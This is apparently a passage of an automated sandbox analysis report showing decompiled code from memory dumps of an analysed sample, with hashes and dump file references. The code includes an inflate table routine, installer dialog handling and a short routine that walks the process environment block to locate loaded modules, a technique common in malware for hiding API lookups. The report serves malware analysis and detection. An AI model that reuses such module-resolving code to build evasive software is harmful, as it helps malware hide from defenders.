                                                                                0x00406d0b
                                                                                0x00406d0d
                                                                                0x00406d10
                                                                                0x00406d13
                                                                                0x00406d18
                                                                                0x00406d1b
                                                                                0x00406d1d
                                                                                0x00406d1e
                                                                                0x00406d21
                                                                                0x00406d2c
                                                                                0x00406d2f
                                                                                0x00406d46
                                                                                0x00406d4b
                                                                                0x00406d52
                                                                                0x00406d57
                                                                                0x00406d5b
                                                                                0x00406d5d
                                                                                0x00406d5d
                                                                                0x00406d5d
                                                                                0x00406d60
                                                                                0x00406d62
                                                                                0x00000000
                                                                                0x00406d68
                                                                                0x00406d68
                                                                                0x00406d6c
                                                                                0x00406d77
                                                                                0x00406d8a
                                                                                0x00406d8f
                                                                                0x00406d94
                                                                                0x00406d96
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406d9c
                                                                                0x00406d9c
                                                                                0x00406d9f
                                                                                0x00406da1
                                                                                0x00406daf
                                                                                0x00406daf
                                                                                0x00406db2
                                                                                0x00406db2
                                                                                0x00406db5
                                                                                0x00406db8
                                                                                0x00406dbb
                                                                                0x00406dbe
                                                                                0x00406dc1
                                                                                0x00406dc4
                                                                                0x00000000
                                                                                0x00406dc4
                                                                                0x00406da3
                                                                                0x00406da3
                                                                                0x00406da9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406da9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407148
                                                                                0x00407148
                                                                                0x0040714e
                                                                                0x00407154
                                                                                0x00407159
                                                                                0x0040715f
                                                                                0x00407165
                                                                                0x00407167
                                                                                0x0040716a
                                                                                0x00407173
                                                                                0x00407179
                                                                                0x00407179
                                                                                0x0040716c
                                                                                0x0040716e
                                                                                0x00407170
                                                                                0x00407170
                                                                                0x0040717b
                                                                                0x0040717d
                                                                                0x00407180
                                                                                0x004071bb
                                                                                0x004071bb
                                                                                0x00000000
                                                                                0x00407182
                                                                                0x00407182
                                                                                0x00407182
                                                                                0x00407188
                                                                                0x0040718b
                                                                                0x0040718d
                                                                                0x004071c2
                                                                                0x004071c4
                                                                                0x00000000
                                                                                0x004071c4
                                                                                0x00000000
                                                                                0x0040718d
                                                                                0x00000000
                                                                                0x004067cc
                                                                                0x0040719a
                                                                                0x00000000
                                                                                0x0040719a
                                                                                0x00406bae
                                                                                0x00406bb0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bb2
                                                                                0x00406bb2
                                                                                0x00406bb5
                                                                                0x00000000
                                                                                0x00406bb5
                                                                                0x00406afa
                                                                                0x00406abb
                                                                                0x0040719f
                                                                                0x004071a2
                                                                                0x004071a4
                                                                                0x004071ad
                                                                                0x004071b3
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                                                • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407272, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6d0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6d0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                0x0040727d
                                                                                0x00407285
                                                                                0x00407289
                                                                                0x0040728b
                                                                                0x0040728e
                                                                                0x00407290
                                                                                0x00407290
                                                                                0x00407292
                                                                                0x00407299
                                                                                0x0040729b
                                                                                0x0040729b
                                                                                0x004072a1
                                                                                0x004072b6
                                                                                0x004072be
                                                                                0x004072c0
                                                                                0x004072c2
                                                                                0x004072c5
                                                                                0x004072c6
                                                                                0x004072c6
                                                                                0x004072cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004072ce
                                                                                0x004072d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004072d1
                                                                                0x004072d5
                                                                                0x004072d8
                                                                                0x004072da
                                                                                0x004072da
                                                                                0x004072dd
                                                                                0x004072e3
                                                                                0x004072e4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004072e4
                                                                                0x004072e9
                                                                                0x004072ec
                                                                                0x004072ee
                                                                                0x004072ee
                                                                                0x004072f4
                                                                                0x004072f6
                                                                                0x00407307
                                                                                0x004072fa
                                                                                0x004072fe
                                                                                0x004075a3
                                                                                0x00000000
                                                                                0x004075a3
                                                                                0x00407304
                                                                                0x00407305
                                                                                0x00407305
                                                                                0x0040730d
                                                                                0x00407310
                                                                                0x00407314
                                                                                0x00407316
                                                                                0x00407318
                                                                                0x0040731b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407323
                                                                                0x00407329
                                                                                0x0040732b
                                                                                0x0040732d
                                                                                0x0040732e
                                                                                0x00407343
                                                                                0x00407343
                                                                                0x00407346
                                                                                0x00407348
                                                                                0x00407348
                                                                                0x0040734a
                                                                                0x0040734f
                                                                                0x00407351
                                                                                0x00407358
                                                                                0x0040735a
                                                                                0x00407362
                                                                                0x00407362
                                                                                0x00407364
                                                                                0x00407365
                                                                                0x00407374
                                                                                0x00407378
                                                                                0x0040737c
                                                                                0x0040737f
                                                                                0x00407382
                                                                                0x00407387
                                                                                0x0040738a
                                                                                0x00407390
                                                                                0x00407397
                                                                                0x0040739d
                                                                                0x00407596
                                                                                0x00407596
                                                                                0x0040759b
                                                                                0x004075aa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040759b
                                                                                0x004073aa
                                                                                0x004073ad
                                                                                0x004073b0
                                                                                0x004073b3
                                                                                0x004073b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004073c2
                                                                                0x004073c5
                                                                                0x004073c6
                                                                                0x004073c8
                                                                                0x004073ce
                                                                                0x004073d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004073d7
                                                                                0x004073d8
                                                                                0x004073db
                                                                                0x004073de
                                                                                0x004073e1
                                                                                0x004073e7
                                                                                0x004073e9
                                                                                0x004073e9
                                                                                0x004073f1
                                                                                0x004073f5
                                                                                0x004073fa
                                                                                0x0040741f
                                                                                0x00407425
                                                                                0x00407427
                                                                                0x00407429
                                                                                0x0040742c
                                                                                0x00407435
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004073fc
                                                                                0x004073fc
                                                                                0x00407405
                                                                                0x00407409
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040741a
                                                                                0x0040741a
                                                                                0x0040741d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040740d
                                                                                0x00407410
                                                                                0x00407412
                                                                                0x00407416
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407418
                                                                                0x00407418
                                                                                0x00000000
                                                                                0x0040741a
                                                                                0x0040743e
                                                                                0x00407444
                                                                                0x0040744e
                                                                                0x00407450
                                                                                0x00407455
                                                                                0x00407457
                                                                                0x0040748d
                                                                                0x00407459
                                                                                0x00407459
                                                                                0x0040745c
                                                                                0x0040745f
                                                                                0x00407469
                                                                                0x0040746c
                                                                                0x00407473
                                                                                0x0040747e
                                                                                0x00407485
                                                                                0x00407485
                                                                                0x0040748f
                                                                                0x00407492
                                                                                0x00407494
                                                                                0x0040749a
                                                                                0x0040749a
                                                                                0x004074a3
                                                                                0x004074a6
                                                                                0x004074ab
                                                                                0x004074ba
                                                                                0x004074c2
                                                                                0x004074c7
                                                                                0x004074eb
                                                                                0x004074f3
                                                                                0x004074f7
                                                                                0x004074fd
                                                                                0x004074c9
                                                                                0x004074d7
                                                                                0x004074da
                                                                                0x004074e0
                                                                                0x004074e0
                                                                                0x00407501
                                                                                0x004074bc
                                                                                0x004074bc
                                                                                0x004074bc
                                                                                0x00407512
                                                                                0x00407516
                                                                                0x00407522
                                                                                0x0040751d
                                                                                0x00407520
                                                                                0x00407520
                                                                                0x0040752a
                                                                                0x0040752f
                                                                                0x00407537
                                                                                0x00407533
                                                                                0x00407535
                                                                                0x00407535
                                                                                0x0040753d
                                                                                0x0040753f
                                                                                0x00407546
                                                                                0x00407550
                                                                                0x0040755a
                                                                                0x00407576
                                                                                0x0040757a
                                                                                0x004073bf
                                                                                0x004073c5
                                                                                0x004073c6
                                                                                0x004073c8
                                                                                0x004073ce
                                                                                0x004073d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004073d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040755c
                                                                                0x0040755c
                                                                                0x0040755c
                                                                                0x00407561
                                                                                0x0040756a
                                                                                0x00407573
                                                                                0x00000000
                                                                                0x00407573
                                                                                0x00407580
                                                                                0x00407580
                                                                                0x00407583
                                                                                0x0040758a
                                                                                0x0040758d
                                                                                0x00000000
                                                                                0x004073b0
                                                                                0x00407330
                                                                                0x00407332
                                                                                0x00407332
                                                                                0x00407336
                                                                                0x00407339
                                                                                0x0040733a
                                                                                0x0040733a
                                                                                0x00000000
                                                                                0x00407332
                                                                                0x004072a6
                                                                                0x004072ac
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                                                • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6EEE6E07, Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E6EEE6E07(void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E6EEE6D4B(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}








                                                                                0x6eee6e13
                                                                                0x6eee6e1c
                                                                                0x6eee6e25
                                                                                0x6eee6e2e
                                                                                0x6eee6e31
                                                                                0x6eee6e50
                                                                                0x6eee6e59
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee6e5b
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                • Instruction ID: 40aa40d670f6bcaf5b3f9c90f1901b0474ee095053f0afc6dbc500cd3a37ea20
                                                                                • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                • Instruction Fuzzy Hash: 03014D78A20209EFCB80DFA8C58099DBBF4FB08720F208495E918E7721D330AE509B40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6EEE6B57, Relevance: .0, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E6EEE6B57() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                                                0x6eee6b6e

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x6aacde
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
